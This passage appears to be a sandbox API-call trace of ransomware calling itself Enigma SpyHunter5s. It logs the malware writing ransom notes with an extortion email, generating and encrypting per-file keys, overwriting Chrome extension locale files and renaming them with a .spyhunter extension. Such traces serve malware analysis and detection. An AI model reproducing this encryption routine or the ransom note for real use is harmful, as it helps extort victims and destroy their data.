decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.483] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x248eb13*, lpNumberOfBytesWritten=0x248ec3c*=0x127, lpOverlapped=0x0) returned 1 [0159.484] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.484] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec3c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.484] CloseHandle (hObject=0x9c) returned 1 [0159.484] GetProcessHeap () returned 0x2c0000 [0159.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06940 | out: hHeap=0x2c0000) returned 1 [0159.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebd8 | out: pbBuffer=0x248ebd8) returned 1 [0159.485] GetProcessHeap () returned 0x2c0000 [0159.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebd0*=0x30) returned 1 [0159.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0159.486] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.486] GetProcessHeap () returned 0x2c0000 [0159.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.486] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb94*=0x30f, lpOverlapped=0x0) returned 1 [0159.693] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcf1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.693] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x248eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb94*=0x30f, lpOverlapped=0x0) returned 1 [0159.693] GetProcessHeap () returned 0x2c0000 [0159.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.693] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.693] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb94, lpOverlapped=0x0 | out: lpBuffer=0x248ebd4*, lpNumberOfBytesWritten=0x248eb94*=0x4, lpOverlapped=0x0) returned 1 [0159.693] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb94*=0x30, lpOverlapped=0x0) returned 1 [0159.693] CloseHandle (hObject=0x9c) returned 1 [0159.693] GetProcessHeap () returned 0x2c0000 [0159.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.693] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.spyhunter") returned 169 [0159.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0159.695] GetProcessHeap () returned 0x2c0000 [0159.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.695] GetProcessHeap () returned 0x2c0000 [0159.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.695] GetProcessHeap () returned 0x2c0000 [0159.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0159.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.696] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.696] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb0b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec34, lpOverlapped=0x0 | out: lpBuffer=0x248eb0b*, lpNumberOfBytesWritten=0x248ec34*=0x127, lpOverlapped=0x0) returned 1 [0159.697] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.697] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec34, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec34*=0x2ac, lpOverlapped=0x0) returned 1 [0159.697] CloseHandle (hObject=0x9c) returned 1 [0159.697] GetProcessHeap () returned 0x2c0000 [0159.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f062e0 | out: hHeap=0x2c0000) returned 1 [0159.697] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebd0 | out: pbBuffer=0x248ebd0) returned 1 [0159.697] GetProcessHeap () returned 0x2c0000 [0159.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebc8*=0x30) returned 1 [0159.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.698] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0159.698] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.698] GetProcessHeap () returned 0x2c0000 [0159.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.698] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb8c*=0x29a, lpOverlapped=0x0) returned 1 [0159.752] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.752] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x248eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb8c*=0x29a, lpOverlapped=0x0) returned 1 [0159.752] GetProcessHeap () returned 0x2c0000 [0159.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.752] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.752] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb8c, lpOverlapped=0x0 | out: lpBuffer=0x248ebcc*, lpNumberOfBytesWritten=0x248eb8c*=0x4, lpOverlapped=0x0) returned 1 [0159.752] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb8c*=0x30, lpOverlapped=0x0) returned 1 [0159.753] CloseHandle (hObject=0x9c) returned 1 [0159.753] GetProcessHeap () returned 0x2c0000 [0159.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.753] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.spyhunter") returned 169 [0159.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0159.754] GetProcessHeap () returned 0x2c0000 [0159.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.754] GetProcessHeap () returned 0x2c0000 [0159.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.754] GetProcessHeap () returned 0x2c0000 [0159.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81298 | out: hHeap=0x2c0000) returned 1 [0159.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.755] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.755] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb03*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x248eb03*, lpNumberOfBytesWritten=0x248ec2c*=0x127, lpOverlapped=0x0) returned 1 [0159.756] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.756] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec2c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.756] CloseHandle (hObject=0x9c) returned 1 [0159.756] GetProcessHeap () returned 0x2c0000 [0159.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1bb10 | out: hHeap=0x2c0000) returned 1 [0159.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebc8 | out: pbBuffer=0x248ebc8) returned 1 [0159.756] GetProcessHeap () returned 0x2c0000 [0159.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebc0*=0x30) returned 1 [0159.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0159.765] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.765] GetProcessHeap () returned 0x2c0000 [0159.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.765] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb84*=0x29d, lpOverlapped=0x0) returned 1 [0159.812] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.812] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x248eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb84*=0x29d, lpOverlapped=0x0) returned 1 [0159.812] GetProcessHeap () returned 0x2c0000 [0159.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.812] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.813] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb84, lpOverlapped=0x0 | out: lpBuffer=0x248ebc4*, lpNumberOfBytesWritten=0x248eb84*=0x4, lpOverlapped=0x0) returned 1 [0159.813] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb84*=0x30, lpOverlapped=0x0) returned 1 [0159.813] CloseHandle (hObject=0x9c) returned 1 [0159.813] GetProcessHeap () returned 0x2c0000 [0159.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.813] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.spyhunter") returned 169 [0159.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0159.814] GetProcessHeap () returned 0x2c0000 [0159.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.814] GetProcessHeap () returned 0x2c0000 [0159.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.814] GetProcessHeap () returned 0x2c0000 [0159.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80b18 | out: hHeap=0x2c0000) returned 1 [0159.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.816] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.816] WriteFile (in: hFile=0x9c, lpBuffer=0x248eafb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x248eafb*, lpNumberOfBytesWritten=0x248ec24*=0x127, lpOverlapped=0x0) returned 1 [0159.816] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.816] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec24*=0x2ac, lpOverlapped=0x0) returned 1 [0159.817] CloseHandle (hObject=0x9c) returned 1 [0159.817] GetProcessHeap () returned 0x2c0000 [0159.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b978 | out: hHeap=0x2c0000) returned 1 [0159.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebc0 | out: pbBuffer=0x248ebc0) returned 1 [0159.817] GetProcessHeap () returned 0x2c0000 [0159.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebb8*=0x30) returned 1 [0159.824] CreateFileW 